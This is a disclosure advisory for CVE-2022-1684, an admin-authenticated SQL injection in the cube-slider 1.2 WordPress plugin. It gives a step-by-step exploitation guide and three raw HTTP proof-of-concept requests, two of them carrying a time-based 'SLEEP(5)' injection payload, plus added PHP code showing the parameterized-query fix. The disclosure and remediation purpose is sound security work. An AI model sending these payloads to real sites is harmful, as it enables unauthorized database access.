cube-slider 1.2 WordPress plugin SQL injection

Vulnerability Metadata

Key                         Value
Date of Disclosure          May 09 2022
Affected Software           cube-slider
Affected Software Type      WordPress plugin
Version                     1.2
Weakness                    SQL Injection
CWE ID                      CWE-89
CVE ID                      CVE-2022-1684
CVSS 3.x Base Score         2.7
CVSS 2.0 Base Score         4.0
Reporter                    Daniel Krohmer, Shi Chen
Reporter Contact            daniel.krohmer@iese.fraunhofer.de
Link to Affected Software   https://wordpress.org/plugins/cube-slider
Link to Vulnerability DB    https://nvd.nist.gov/vuln/detail/CVE-2022-1684

Vulnerability Description

The idslider data parameter in cube-slider 1.2 is vulnerable to SQL injection in three different code sections. An authenticated attacker (the steps below require administrator privileges) can abuse the edit, delete or save functionality of the plugin by crafting a malicious POST request.

Exploitation Guide

Exploit 1: Edit

Log in as admin user. This attack requires at least admin privileges.

cube-slider_1_step-1.png

Go to Settings and select Cube Slider in the sub menu.

cube-slider_1_step-2.png

Add a new cube slider by clicking on New Cube Slider.

cube-slider_1_step-3.png

Scroll down and use the Click to edit slider x details button.

cube-slider_1_step-4.png

Clicking the button from the previous step triggers the vulnerable request; idslider is the vulnerable data parameter.

cube-slider_1_step-5.png

A POC may look like the following request:

cube-slider_1_step-6.png

In the code, the vulnerability is triggered by unsanitized user input of idslider at line 207 in ./init.php.

cube-slider_1_step-7.png

Exploit 2: Delete

Log in as admin user. This attack requires at least admin privileges.

cube-slider_2_step-1.png

Go to Settings and select Cube Slider in the sub menu.

cube-slider_2_step-2.png

Delete an arbitrary, existing slider by clicking on Click to delete slider x.

cube-slider_2_step-3.png

Clicking the button from the previous step triggers the vulnerable request; idslider is the vulnerable data parameter. (Note: the numeric ID value can be set arbitrarily.)

cube-slider_2_step-4.png

A POC may look like the following request:

cube-slider_2_step-5.png

In the code, the vulnerability is triggered by unsanitized user input of idslider at line 210 in ./init.php.

cube-slider_2_step-6.png

Exploit 3: Save

Log in as admin user. This attack requires at least admin privileges.

cube-slider_3_step-1.png

Go to Settings and select Cube Slider in the sub menu.

cube-slider_3_step-2.png

Add a new cube slider by clicking on New Cube Slider.

cube-slider_3_step-3.png

Scroll down and use the Save changes button. No further data input is needed before clicking this button.

cube-slider_3_step-4.png

Clicking the button from the previous step triggers the vulnerable request; idslider is the vulnerable data parameter.

cube-slider_3_step-5.png

A POC may look like the following request:

cube-slider_3_step-6.png

In the code, the vulnerability is triggered by unsanitized user input of idslider at line 199 in ./init.php. Notice that there is no sanitization at all in the whole query!

cube-slider_3_step-7.png
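The three code locations above share one root cause: the raw idslider value (and, in the save handler, every other form field) is spliced into the SQL text. The following is a hardening example added to this advisory, not code from the cube-slider plugin. It assumes a slider table named {$wpdb->prefix}cubeslider whose column names match the POST field names, and an admin form nonce for the action 'cubeslider_manage'; both are assumptions, since the advisory does not show the plugin's schema or nonce action. It demonstrates the fix a maintainer would apply to all three handlers: strict integer validation of the id, $wpdb->prepare() or format placeholders for every value, and a capability plus nonce check before any state change.

```php
<?php
/**
 * Added hardening example for the edit / delete / save handlers described in
 * this advisory. Not the plugin's own code.
 * Assumptions (not taken from the advisory): the slider table is
 * {$wpdb->prefix}cubeslider, its columns match the POST field names, and the
 * admin form carries a nonce created for the action 'cubeslider_manage'.
 */

/** Return the slider id as a positive integer, or null if the value is not one. */
function cubeslider_read_id(array $post): ?int {
    if (!isset($post['idslider'])) {
        return null;
    }
    $raw = wp_unslash($post['idslider']);
    // Accept only a plain decimal integer. A value such as
    // "4 AND (SELECT ... SLEEP(5) ...)" fails this test before any SQL is built.
    if (!is_string($raw) || !preg_match('/^[1-9][0-9]*$/', $raw)) {
        return null;
    }
    return (int) $raw;
}

/** Common gate for every state-changing request on the settings page. */
function cubeslider_authorize(): void {
    if (!current_user_can('manage_options')) {
        wp_die('Insufficient privileges', '', ['response' => 403]);
    }
    // Ties the request to a nonce issued for this admin form (CSRF protection).
    check_admin_referer('cubeslider_manage');
}

/** Dispatch the edit / delete / save actions with every value bound via a placeholder. */
function cubeslider_handle_request(array $post): void {
    global $wpdb;
    $table = $wpdb->prefix . 'cubeslider';  // assumed table name

    cubeslider_authorize();
    $id = cubeslider_read_id($post);
    if ($id === null) {
        wp_die('Invalid slider id', '', ['response' => 400]);
    }

    if (isset($post['edit'])) {
        // %d is an integer placeholder; prepare() does the quoting, not string concatenation.
        $row = $wpdb->get_row(
            $wpdb->prepare("SELECT * FROM {$table} WHERE idslider = %d", $id),
            ARRAY_A
        );
        // ... render the edit form from $row (omitted) ...
        return;
    }

    if (isset($post['delete'])) {
        // $wpdb->delete() builds the WHERE clause from the given format ('%d').
        $wpdb->delete($table, ['idslider' => $id], ['%d']);
        return;
    }

    if (isset($post['submit'])) {
        $data   = [];
        $format = [];
        foreach (['name', 'about'] as $field) {
            $data[$field] = sanitize_text_field(wp_unslash($post[$field] ?? ''));
            $format[]     = '%s';
        }
        for ($i = 1; $i <= 4; $i++) {
            $data["title{$i}"]       = sanitize_text_field(wp_unslash($post["title{$i}"] ?? ''));
            $data["description{$i}"] = sanitize_text_field(wp_unslash($post["description{$i}"] ?? ''));
            $data["icon{$i}"]        = sanitize_text_field(wp_unslash($post["icon{$i}"] ?? ''));
            // Colours are posted as #rrggbb; anything else is stored as empty.
            $color = (string) wp_unslash($post["color{$i}"] ?? '');
            $data["color{$i}"] = preg_match('/^#[0-9a-fA-F]{6}$/', $color) ? $color : '';
            array_push($format, '%s', '%s', '%s', '%s');
        }
        // Every column value is bound with '%s' and the id with '%d'; nothing is concatenated.
        $wpdb->update($table, $data, ['idslider' => $id], $format, ['%d']);
    }
}
```

With this structure the time-based payload shown in the Exploit Payload section never reaches the database: cubeslider_read_id() rejects it as a non-integer, and even an id that passed would be bound through a %d placeholder rather than spliced into the query text. The same applies to the save handler, where the advisory notes that no field at all was sanitized: each free-text field is passed through a %s placeholder by $wpdb->update().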

Exploit Payload

Note that the cookies and nonces need to be replaced with values valid for your own session, otherwise the requests will not work. The SQL injection can be triggered by sending the requests below.

Exploit Payload 1: Edit

POST /wp-admin/options-general.php?page=cubeslider HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://localhost/wp-admin/options-general.php?page=cubeslider
Content-Type: application/x-www-form-urlencoded
Content-Length: 90
Origin: http://localhost
DNT: 1
Connection: close
Cookie: wordpress_86a9106ae65537651a8e456835b316ab=admin%7C1651687988%7CUPnEJkZ0Ap9XXkqMv5ca4t4TaonaH58fHCuAQAFLgpn%7C9362415c79f3c67e8d1d87aa2c44ffaaf82b64262878824bbe4617c277a00b55; wordpress_test_cookie=WP%20Cookie%20check; wordpress_logged_in_86a9106ae65537651a8e456835b316ab=admin%7C1651687988%7CUPnEJkZ0Ap9XXkqMv5ca4t4TaonaH58fHCuAQAFLgpn%7C73a1ec3e227fd14f99e01a1ad8f86dccaa2ca668c00526f25564e4744e644ab0; wp-settings-1=editor%3Dtinymce%26amplibraryContent%3Dbrowse%26wd_ads_manage_groups_tab%3Dpop; wp-settings-time-1=1651515188
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1

idslider=4+AND+(SELECT+3477+FROM+(SELECT(SLEEP(5)))DhVP)&edit=Click+to+edit+slider+4+details

Exploit Payload 2: Delete

POST /wp-admin/options-general.php?page=cubeslider HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://localhost/wp-admin/options-general.php?page=cubeslider
Content-Type: application/x-www-form-urlencoded
Content-Length: 90
Origin: http://localhost
DNT: 1
Connection: close
Cookie: wordpress_86a9106ae65537651a8e456835b316ab=admin%7C1651687988%7CUPnEJkZ0Ap9XXkqMv5ca4t4TaonaH58fHCuAQAFLgpn%7C9362415c79f3c67e8d1d87aa2c44ffaaf82b64262878824bbe4617c277a00b55; wordpress_test_cookie=WP%20Cookie%20check; wordpress_logged_in_86a9106ae65537651a8e456835b316ab=admin%7C1651687988%7CUPnEJkZ0Ap9XXkqMv5ca4t4TaonaH58fHCuAQAFLgpn%7C73a1ec3e227fd14f99e01a1ad8f86dccaa2ca668c00526f25564e4744e644ab0; wp-settings-1=editor%3Dtinymce%26amplibraryContent%3Dbrowse%26wd_ads_manage_groups_tab%3Dpop; wp-settings-time-1=1651515188
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1

idslider=4+AND+(SELECT+3477+FROM+(SELECT(SLEEP(5)))DhVP)&delete=Click+to+delete+slider+4

Exploit Payload 3: Save

POST /wp-admin/options-general.php?page=cubeslider HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://localhost/wp-admin/options-general.php?page=cubeslider
Content-Type: application/x-www-form-urlencoded
Content-Length: 394
Origin: http://localhost
DNT: 1
Connection: close
Cookie: wordpress_86a9106ae65537651a8e456835b316ab=admin%7C1651690550%7CIzsJvLe5qAzDH1qctKYKvf3fOqLu1Dshnphbt1aOLX5%7C8968917a5337f07f5db390194b15adfae8e850d20bc1c476fb1224002a9d5ca4; wordpress_test_cookie=WP%20Cookie%20check; wordpress_logged_in_86a9106ae65537651a8e456835b316ab=admin%7C1651690550%7CIzsJvLe5qAzDH1qctKYKvf3fOqLu1Dshnphbt1aOLX5%7C5d10d0aa6e661c1d443d69997bb114ab7ea5fe8071c573c62f098d0ece9efe01; wp-settings-1=editor%3Dtinymce%26amplibraryContent%3Dbrowse%26wd_ads_manage_groups_tab%3Dpop; wp-settings-time-1=1651517751
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1

idslider=6&name=Name&about=About&title1=Title+1&description1=Description+1&title2=Title+2&description2=Description+2&title3=Title+3&description3=Description+3&title4=Title+4&description4=Description+4&icon1=fa-glass&color1=%2381d742&icon2=fa-glass&color2=%2381d742&icon3=fa-glass&color3=%2381d742&icon4=fa-glass&color4=%2381d742&submit=Save+Changes